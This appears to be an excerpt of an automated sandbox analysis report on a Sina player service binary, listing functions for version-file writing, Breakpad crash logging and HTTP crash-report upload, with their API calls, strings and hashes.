                                                                                                                                                                                                    • ?CreateDirectoryW@base@@YA_NABVFilePath@1@@Z.BASE(00000000), ref: 00398BEB
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 00398BFB
                                                                                                                                                                                                    • ?WriteFile@base@@YAHABVFilePath@1@PBDH@Z.BASE(?,00000000,00000000), ref: 00398C13
                                                                                                                                                                                                    • ??1JSONStringValueSerializer@@UAE@XZ.BASE ref: 00398C38
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 00398C57
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 00398C7A
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 00398C9D
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 00398CC4
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$Path@base@@$??3@$V12@$D@std@@DictionarySerializer@@StringU?$char_traits@V?$allocator@V?$basic_string@ValueValue@base@@$Append@D@2@@std@@0@Name@PathPath@1@@String@U?$char_traits@_V01@V01@@V?$allocator@_V?$basic_string@_W@2@@std@@@W@std@@$??2@CreateD@2@@std@@@DirectoryExists@base@@File@base@@Get@Path@1@Path@base@@@Serialize@Service@@Value@base@@@W@base@@Write
                                                                                                                                                                                                    • String ID: backup_ver$cur_ver
                                                                                                                                                                                                    • API String ID: 415853976-3805504336
                                                                                                                                                                                                    • Opcode ID: dd17871e8501d22be52a110615eff4bd0da0d20fddfe4d05e10f70918d778d08
                                                                                                                                                                                                    • Instruction ID: a29166d2c21fc44d51c2e5b0a8016a0ab82cfe4ef5f3b5efe026c4e9e9976526
                                                                                                                                                                                                    • Opcode Fuzzy Hash: dd17871e8501d22be52a110615eff4bd0da0d20fddfe4d05e10f70918d778d08
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6AB16EB1C00248DFEF12DBA4C8497DEBFB4AF16314F1841A9D40AB7291DB765A89CF61
                                                                                                                                                                                                    Function 0038C940 Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 209threadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120(8285FFAB), ref: 0038C996
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 0038C9B9
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 0038C9F3
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0038CA2E
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0038CA4E
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120(8285FFAB), ref: 00371937
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 0037194E
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 00371965
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00371AC5
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?uncaught_exception@std@@YA_NXZ.MSVCP120 ref: 00371AD2
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP120 ref: 00371ADF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371AEF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371B03
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(00000000), ref: 0038CA6B
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?flags@ios_base@std@@QBEHXZ.MSVCP120(?), ref: 003719B4
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 003719DE
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 003719E9
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A08
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP120(?,?,00000000), ref: 00371A18
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A41
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 00371A4C
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QAE_J_J@Z.MSVCP120(00000000,00000000), ref: 00371A85
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120 ref: 0038CA8E
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 0038CA9F
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 0038CAB9
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120 ref: 0038CAC1
                                                                                                                                                                                                    • OutputDebugStringA.KERNEL32(00000000,?), ref: 0038CADF
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0038CAEE
                                                                                                                                                                                                    • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 0038CB3F
                                                                                                                                                                                                    • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 0038CB4B
                                                                                                                                                                                                    • ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ.MSVCP120 ref: 0038CB57
                                                                                                                                                                                                      • Part of subcall function 00375EC0: InterlockedCompareExchange.KERNEL32(003AC118,00000001,00000000), ref: 00375EFB
                                                                                                                                                                                                      • Part of subcall function 00375EC0: ??2@YAPAXI@Z.MSVCR120(00000134,?,?,?,003993DB,000000FF), ref: 00375F0A
                                                                                                                                                                                                      • Part of subcall function 00375EC0: ?RegisterCallback@AtExitManager@base@@SAXP6AXPAX@Z0@Z.BASE(00375EA0,00000000), ref: 00375F45
                                                                                                                                                                                                      • Part of subcall function 003766C0: ??2@YAPAXI@Z.MSVCR120(00000014), ref: 003766EF
                                                                                                                                                                                                      • Part of subcall function 003766C0: ??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ.BASE(6C6C56E0,00000000), ref: 0037670A
                                                                                                                                                                                                      • Part of subcall function 003766C0: ??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z.BASE(00000000,6C6C56E0,00000000), ref: 0037673D
                                                                                                                                                                                                    • ?GetProgramCounter@tracked_objects@@YAPBXXZ.BASE(00000000), ref: 0038CB96
                                                                                                                                                                                                    • ??0Location@tracked_objects@@QAE@PBD0HPBX@Z.BASE(breakpad::CrashService::OnClientUploadRequest,breakpad\tools\crash_service.cc,00000229,00000000), ref: 0038CBB2
                                                                                                                                                                                                      • Part of subcall function 0037A100: ?PostTask@MessageLoop@base@@QAEXABVLocation@tracked_objects@@ABV?$Callback@$$A6AXXZ@2@@Z.BASE(?,?), ref: 0037A11C
                                                                                                                                                                                                    • ??1CallbackBase@internal@base@@IAE@XZ.BASE ref: 0038CC88
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$V01@V?$basic_streambuf@$??6?$basic_ostream@?rdbuf@?$basic_ios@D@std@@@2@$?width@ios_base@std@@$??2@?sputc@?$basic_streambuf@Base@internal@base@@CallbackLocation@tracked_objects@@ThreadU?$char_traits@_W@std@@@std@@$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@_??1?$basic_iostream@??1?$basic_streambuf@??3@?flags@ios_base@std@@?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@Base@12@@Base@subtle@base@@BindCallback@Callback@$$CompareCountCountedCounter@tracked_objects@@CurrentD@std@@@1@@DebugExchangeExitInterlockedLoop@base@@Manager@base@@MessageOsfx@?$basic_ostream@OutputPostProgramRegisterSafeStateStringTask@TickV01@@Z@2@@
                                                                                                                                                                                                    • String ID: )#sinaclient#[$)- $OnClientUploadRequest crash_id = $breakpad::CrashService::OnClientUploadRequest$breakpad\tools\crash_service.cc
                                                                                                                                                                                                    • API String ID: 2188131305-3161232688
                                                                                                                                                                                                    • Opcode ID: 52952071f184128ebb201305c04e3e9e2600740e01cbc529e728f61327582b33
                                                                                                                                                                                                    • Instruction ID: c2bc914627aa0a6f25541b730ad57ef67a17cdd89c5558076638cf7cb71b1913
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 52952071f184128ebb201305c04e3e9e2600740e01cbc529e728f61327582b33
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 509162B1900208EFDF12EFA4ED4AFDEB7B8EB15304F0045A6E519A7291EB755A04CF61
                                                                                                                                                                                                    Function 0038B780 Relevance: 45.7, APIs: 21, Strings: 5, Instructions: 170windowthreadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(003AC14C), ref: 0038B7C2
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 0038B806
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 0038B83C
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0038B879
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0038B899
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120(8285FFAB), ref: 00371937
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 0037194E
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 00371965
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00371AC5
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?uncaught_exception@std@@YA_NXZ.MSVCP120 ref: 00371AD2
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP120 ref: 00371ADF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371AEF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371B03
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 0038B8B6
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?flags@ios_base@std@@QBEHXZ.MSVCP120(?), ref: 003719B4
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 003719DE
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 003719E9
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A08
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP120(?,?,00000000), ref: 00371A18
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A41
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 00371A4C
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QAE_J_J@Z.MSVCP120(00000000,00000000), ref: 00371A85
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120 ref: 0038B8D9
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 0038B8EA
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 0038B904
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120 ref: 0038B90C
                                                                                                                                                                                                    • OutputDebugStringA.KERNEL32(00000000,?), ref: 0038B92A
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0038B939
                                                                                                                                                                                                    • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 0038B987
                                                                                                                                                                                                    • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 0038B993
                                                                                                                                                                                                    • ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ.MSVCP120 ref: 0038B99C
                                                                                                                                                                                                    • ?GetVlogLevelHelper@logging@@YAHPBDI@Z.BASE(breakpad\tools\crash_service.cc,00000020), ref: 0038B9A9
                                                                                                                                                                                                    • ??0LogMessage@logging@@QAE@PBDHH@Z.BASE(breakpad\tools\crash_service.cc,00000137,000000FF), ref: 0038B9C9
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(?,00000005), ref: 0038B9F4
                                                                                                                                                                                                    • ??1LogMessage@logging@@QAE@XZ.BASE ref: 0038BA0C
                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(?), ref: 0038BA16
                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(003AC14C), ref: 0038BA21
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$V01@$??6?$basic_ostream@V?$basic_streambuf@$?rdbuf@?$basic_ios@D@std@@@2@$?width@ios_base@std@@$Interlocked$?sputc@?$basic_streambuf@IncrementMessage@logging@@U?$char_traits@_W@std@@@std@@$??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@_??1?$basic_iostream@??1?$basic_streambuf@??3@?flags@ios_base@std@@?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@CountCurrentD@std@@@1@@DebugDecrementHelper@logging@@LevelOsfx@?$basic_ostream@OutputStringThreadTickV01@@Vlog
                                                                                                                                                                                                    • String ID: )#sinaclient#[$)- $breakpad\tools\crash_service.cc$client start. pid = $Vll
                                                                                                                                                                                                    • API String ID: 3593502776-2176258545
                                                                                                                                                                                                    • Opcode ID: 23ae2762cd5ff4f35b3ce0e3349c64143f8ecb11d418cab415fd0ad6105e342d
                                                                                                                                                                                                    • Instruction ID: db95a0dddc15a098c37ab4fa1b12b641a82d14d4b44b87f1d7bab310d505c75e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 23ae2762cd5ff4f35b3ce0e3349c64143f8ecb11d418cab415fd0ad6105e342d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D6718275E00208AFDF12EFA4ED4ABDDBBB8FB14305F0045A9E40AA7291DB759A44CF51
                                                                                                                                                                                                    Function 00391AF0 Relevance: 44.0, APIs: 18, Strings: 7, Instructions: 298networkCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • memset.MSVCR120 ref: 00391B80
                                                                                                                                                                                                    • InternetCrackUrlW.WININET(?,?,00000000,?), ref: 00391BE7
                                                                                                                                                                                                    • InternetOpenW.WININET(Breakpad/1.0 (Windows),00000000,00000000,00000000,00000000), ref: 00391C84
                                                                                                                                                                                                    • InternetConnectW.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00391CBC
                                                                                                                                                                                                    • HttpOpenRequestW.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000000), ref: 00391D04
                                                                                                                                                                                                    • HttpAddRequestHeadersW.WININET(00000000,?,000000FF,20000000), ref: 00391D70
                                                                                                                                                                                                    • InternetSetOptionW.WININET(00000000,00000005,?,00000004), ref: 00391DD5
                                                                                                                                                                                                    • __iob_func.MSVCR120 ref: 00391DE4
                                                                                                                                                                                                    • fwprintf.MSVCR120 ref: 00391DEE
                                                                                                                                                                                                    • InternetSetOptionW.WININET(00000000,00000006,?,00000004), ref: 00391E03
                                                                                                                                                                                                    • __iob_func.MSVCR120 ref: 00391E12
                                                                                                                                                                                                    • fwprintf.MSVCR120 ref: 00391E1C
                                                                                                                                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00391E45
                                                                                                                                                                                                    • HttpQueryInfoW.WININET(00000000,00000013,00000005,?,00000000), ref: 00391E69
                                                                                                                                                                                                    • wcstol.MSVCR120 ref: 00391E7B
                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00391EE3
                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00391EE6
                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00391EEF
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Internet$Http$CloseHandleRequest$OpenOption__iob_funcfwprintf$ConnectCrackHeadersInfoQuerySendmemsetwcstol
                                                                                                                                                                                                    • String ID: <$Breakpad/1.0 (Windows)$Could not unset receive timeout, continuing...$Could not unset send timeout, continuing...$POST$http$https
                                                                                                                                                                                                    • API String ID: 3029656879-3705295068
                                                                                                                                                                                                    • Opcode ID: 136c8938986b4aa5a6421843aa3ce28174d5f4ba3f03304306a636ecd894b931
                                                                                                                                                                                                    • Instruction ID: f2cad09d0673a47aed2c4e86048c89aa15ecf6b639fc801628960c9deae969cd
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 136c8938986b4aa5a6421843aa3ce28174d5f4ba3f03304306a636ecd894b931
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 13C194B1940219ABEF22DF14CC45BEE77BCAF14704F0004E5EA09B7281EB759A84CF69
                                                                                                                                                                                                    Function 6C580FC8 Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 222stringCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _wcsnlen.LIBCMT(?,00007FFF,?,?,00000000,00000007,?,6C581179,?,?,6C5811A0,0000000C), ref: 6C580FF0
                                                                                                                                                                                                    • _wcsnlen.LIBCMT(?,00007FFF,?,00007FFF,?,?,00000000,00000007,?,6C581179,?,?,6C5811A0,0000000C), ref: 6C580FFA
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(-00000002,00000002), ref: 6C581021
                                                                                                                                                                                                    • wcscpy_s.MSVCR120(00000000,?,?), ref: 6C581038
                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6C58108E
                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6C5810AD
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(00000000,00000001), ref: 6C5810BD
                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6C5810DC
                                                                                                                                                                                                    • strlen.MSVCR120(?), ref: 6C5810ED
                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000000,00000000,00000000), ref: 6C58110B
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6C581133
                                                                                                                                                                                                    • wcscpy_s.MSVCR120(00000000,?,?,00000000,?,?), ref: 6C581056
                                                                                                                                                                                                      • Part of subcall function 6C561693: _errno.MSVCR120(?,?,6C5CBEB4,6C633568,00000314,Runtime Error!Program: ,?,?,?), ref: 6C5616D5
                                                                                                                                                                                                      • Part of subcall function 6C561693: _invalid_parameter_noinfo.MSVCR120(?,?,6C5CBEB4,6C633568,00000314,Runtime Error!Program: ,?,?,?), ref: 6C5A634D
                                                                                                                                                                                                      • Part of subcall function 6C58120C: wcschr.MSVCR120(?,0000003D,00000000,?,00ED4C78), ref: 6C581232
                                                                                                                                                                                                      • Part of subcall function 6C58120C: free.MSVCR120(?,00000000,?,00ED4C78), ref: 6C581296
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,00000007,?,6C581179,?,?,6C5811A0,0000000C), ref: 6C5AFD29
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(00000000,00000007,?,6C581179,?,?,6C5811A0,0000000C), ref: 6C5AFD34
                                                                                                                                                                                                    • wcschr.MSVCR120(?,0000003D,?,?,00000000,00000007,?,6C581179,?,?,6C5811A0,0000000C), ref: 6C5AFD46
                                                                                                                                                                                                    • _wcsnlen.LIBCMT(-00000002,00007FFF,?,?,00000000,00000007,?,6C581179,?,?,6C5811A0,0000000C), ref: 6C5AFD6A
                                                                                                                                                                                                    • wcslen.MSVCR120(?,?,?,00000000,00000007,?,6C581179,?,?,6C5811A0,0000000C), ref: 6C5AFD76
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(00000001,00000002,?,?,?,00000000,00000007,?,6C581179,?,?,6C5811A0,0000000C), ref: 6C5AFD81
                                                                                                                                                                                                    • wcscpy_s.MSVCR120(00000000,00000001,?), ref: 6C5AFD97
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,00000000,00000007,?,6C581179,?,?,6C5811A0,0000000C), ref: 6C5AFDA4
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,?,00000000,00000007,?,6C581179,?,?,6C5811A0,0000000C), ref: 6C5AFDAF
                                                                                                                                                                                                    • free.MSVCR120(?), ref: 6C5AFDCB
                                                                                                                                                                                                    • free.MSVCR120(00000000), ref: 6C5AFDEE
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ByteCharMultiWide_errno$_calloc_crt_invalid_parameter_noinfo_wcsnlenfreewcscpy_s$wcschr$strlenwcslen
                                                                                                                                                                                                    • String ID: xL
                                                                                                                                                                                                    • API String ID: 3308320376-2859553101
                                                                                                                                                                                                    • Opcode ID: a42a1cba600f048ac0243d476908f682ea27ccd4fe449d88d7da20244b6db88f
                                                                                                                                                                                                    • Instruction ID: 51699948294a4fd8c359d23e2e06f2e05c42362f94f88d683f6cea9515d25212
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a42a1cba600f048ac0243d476908f682ea27ccd4fe449d88d7da20244b6db88f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FC51FA71905215BEEF118A76CC45FBF36ACDF81368F20462AF824DAAD0EB74CD4187A0
